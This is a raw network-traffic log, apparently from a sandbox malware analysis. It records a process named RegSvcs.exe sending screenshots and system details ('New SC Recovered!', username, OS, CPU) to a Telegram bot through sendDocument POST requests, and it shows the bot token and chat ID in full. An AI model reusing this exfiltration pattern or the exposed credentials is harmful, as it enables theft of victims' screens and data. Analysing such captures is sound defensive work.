                                                                                      2024-12-06 04:53:21 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 61 39 62 61 36 38 36 63 38 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 61 39 62 61 36 38 36 63 38 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 32 2f 31 31 2f 32 30 32 35 20 31 32 3a 35 37 3a 32 34 0a 55 73 65 72
                                                                                      Data Ascii: -----------------------------8dd4a9ba686c827Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd4a9ba686c827Content-Disposition: form-data; name="caption"New SC Recovered!Time: 02/11/2025 12:57:24User
                                                                                      2024-12-06 04:53:21 UTC16355OUTData Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3
                                                                                      Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T
                                                                                      2024-12-06 04:53:21 UTC16355OUTData Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0
                                                                                      Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
                                                                                      2024-12-06 04:53:21 UTC16355OUTData Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a
                                                                                      Data Ascii: |w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
                                                                                      2024-12-06 04:53:21 UTC15447OUTData Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40
                                                                                      Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
                                                                                      2024-12-06 04:53:21 UTC1360OUTData Raw: 28 a2 8a 60 14 51 45 00 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 a8 e5 d7 2f a7 9e 19 ee 24 f3 e6 8a da 4b 6f 32 52 cc cc ae 1c 12 49 3c 90 24 38 fa 0a cc a2 90 5c 28 a2 8a 00 28 a2 8a 60 75 d3 78 c6 2b 98 e2 49 6d 1e 3f 2d 70 0a b0 6c ff 00 2c 74 a9 26 f1 b4 33 c5 e5 36 9a 62 07 ab ac 81 8f e5 81 fc eb 8d a2 b2 54 a0 94 12 5f 0e ab 7e f7 1b 93 6e 4f f9 b7 3a 2d 63 c4 ab a8 e9 0b a7 25 b3 2a ab 86 f3 19 b9 38 cf 6c 7b fa d7 3b 45 15 51 8a 8d ed d5 dc 1b 6e c9 f4 0a 28 a2 a8 46 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b ae d3 75 3b bb 86 da f7 80 40 83 2f 21 da 0e 3d 37 75 fd 6b cc e8 ae 7a 94 5c 93 50 95 ae 67 1a 6a 33 e6 e9 d8 ed fc 55 e2 78 1e d5 ec 2c 24 12 19 06 24 91 7a 01 e8 3d 6b 88 a2 8a 30 f8 78 61 e1 c9 03 a2 a5
                                                                                      Data Ascii: (`QEk\[/p(v/$Ko2RI<$8\((`ux+Im?-pl,t&36bT_~nO:-c%*8l{;EQn(F `2+u;@/!=7ukz\Pgj3Ux,$$z=k0xa
                                                                                      2024-12-06 04:53:21 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 61 39 62 61 36 38 36 63 38 32 37 2d 2d 0d 0a
                                                                                      Data Ascii: -----------------------------8dd4a9ba686c827--
                                                                                      2024-12-06 04:53:22 UTC25INHTTP/1.1 100 Continue
                                                                                      2024-12-06 04:53:22 UTC1510INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Fri, 06 Dec 2024 04:53:22 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 1121
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":170406,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460802,"document":{"file_name":"user-610930 2025-02-11 12-57-33.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZpmdSg0JvKem4r_xgigefiYFbLLJzAAL0FAACOh6ZUgq9r-UGN9C3AQAHbQADNgQ","file_unique_id":"AQAD9BQAAjoemVJy","file_size":12289,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZpmdSg0JvKem4r_xgigefiYFbLLJzAAL0FAACOh6ZUgq9r-UGN9C3AQAHbQADNgQ","file_unique_id":"AQAD9BQAAjoemVJy","file_size":12289,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmaZnUoNCbynpuK_8YIoHn4mBWyyycwAC9BQAAjoemVIKva_lBjfQtzYE","file_unique_id":"AgAD9BQAAjoemVI","file_size":66325},"caption":"New SC Recovered!\n\nTime: 02/11/2025 12:57:24\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      12192.168.2.449968149.154.167.2204432476C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-06 04:53:28 UTC238OUTPOST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=---------------------------8dd4ec7e1fd0ec5
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 66946
                                                                                      Expect: 100-continue
                                                                                      2024-12-06 04:53:29 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 65 63 37 65 31 66 64 30 65 63 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 65 63 37 65 31 66 64 30 65 63 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 32 2f 31 36 2f 32 30 32 35 20 32 30 3a 31 34 3a 31 35 0a 55 73 65 72
                                                                                      Data Ascii: -----------------------------8dd4ec7e1fd0ec5Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd4ec7e1fd0ec5Content-Disposition: form-data; name="caption"New SC Recovered!Time: 02/16/2025 20:14:15User
                                                                                      2024-12-06 04:53:29 UTC16355OUTData Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3
                                                                                      Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T
                                                                                      2024-12-06 04:53:29 UTC16355OUTData Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0
                                                                                      Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
                                                                                      2024-12-06 04:53:29 UTC16355OUTData Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a
                                                                                      Data Ascii: |w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
                                                                                      2024-12-06 04:53:29 UTC15447OUTData Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40
                                                                                      Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
                                                                                      2024-12-06 04:53:29 UTC1360OUTData Raw: 28 a2 8a 60 14 51 45 00 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 a8 e5 d7 2f a7 9e 19 ee 24 f3 e6 8a da 4b 6f 32 52 cc cc ae 1c 12 49 3c 90 24 38 fa 0a cc a2 90 5c 28 a2 8a 00 28 a2 8a 60 75 d3 78 c6 2b 98 e2 49 6d 1e 3f 2d 70 0a b0 6c ff 00 2c 74 a9 26 f1 b4 33 c5 e5 36 9a 62 07 ab ac 81 8f e5 81 fc eb 8d a2 b2 54 a0 94 12 5f 0e ab 7e f7 1b 93 6e 4f f9 b7 3a 2d 63 c4 ab a8 e9 0b a7 25 b3 2a ab 86 f3 19 b9 38 cf 6c 7b fa d7 3b 45 15 51 8a 8d ed d5 dc 1b 6e c9 f4 0a 28 a2 a8 46 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b ae d3 75 3b bb 86 da f7 80 40 83 2f 21 da 0e 3d 37 75 fd 6b cc e8 ae 7a 94 5c 93 50 95 ae 67 1a 6a 33 e6 e9 d8 ed fc 55 e2 78 1e d5 ec 2c 24 12 19 06 24 91 7a 01 e8 3d 6b 88 a2 8a 30 f8 78 61 e1 c9 03 a2 a5
                                                                                      Data Ascii: (`QEk\[/p(v/$Ko2RI<$8\((`ux+Im?-pl,t&36bT_~nO:-c%*8l{;EQn(F `2+u;@/!=7ukz\Pgj3Ux,$$z=k0xa
                                                                                      2024-12-06 04:53:29 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 65 63 37 65 31 66 64 30 65 63 35 2d 2d 0d 0a
                                                                                      Data Ascii: -----------------------------8dd4ec7e1fd0ec5--
                                                                                      2024-12-06 04:53:29 UTC25INHTTP/1.1 100 Continue
                                                                                      2024-12-06 04:53:30 UTC1510INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Fri, 06 Dec 2024 04:53:29 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 1121
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":170408,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460809,"document":{"file_name":"user-610930 2025-02-16 20-24-15.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZqGdSg0nQDBk0w3lEp11sdqoxaaDuAAL1FAACOh6ZUmznjCYFrxzAAQAHbQADNgQ","file_unique_id":"AQAD9RQAAjoemVJy","file_size":12289,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZqGdSg0nQDBk0w3lEp11sdqoxaaDuAAL1FAACOh6ZUmznjCYFrxzAAQAHbQADNgQ","file_unique_id":"AQAD9RQAAjoemVJy","file_size":12289,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmahnUoNJ0AwZNMN5RKddbHaqMWmg7gAC9RQAAjoemVJs54wmBa8cwDYE","file_unique_id":"AgAD9RQAAjoemVI","file_size":66325},"caption":"New SC Recovered!\n\nTime: 02/16/2025 20:14:15\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      13192.168.2.449969149.154.167.2204432476C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-06 04:53:30 UTC238OUTPOST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=---------------------------8dd50f26f7fcbb6
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 66946
                                                                                      Expect: 100-continue
                                                                                      2024-12-06 04:53:30 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 30 66 32 36 66 37 66 63 62 62 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 30 66 32 36 66 37 66 63 62 62 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 32 2f 31 39 2f 32 30 32 35 20 31 34 3a 32 33 3a 35 33 0a 55 73 65 72
                                                                                      Data Ascii: -----------------------------8dd50f26f7fcbb6Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd50f26f7fcbb6Content-Disposition: form-data; name="caption"New SC Recovered!Time: 02/19/2025 14:23:53User
                                                                                      2024-12-06 04:53:30 UTC16355OUTData Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3
                                                                                      Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"|T
                                                                                      2024-12-06 04:53:30 UTC16355OUTData Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0
                                                                                      Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
                                                                                      2024-12-06 04:53:30 UTC16355OUTData Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 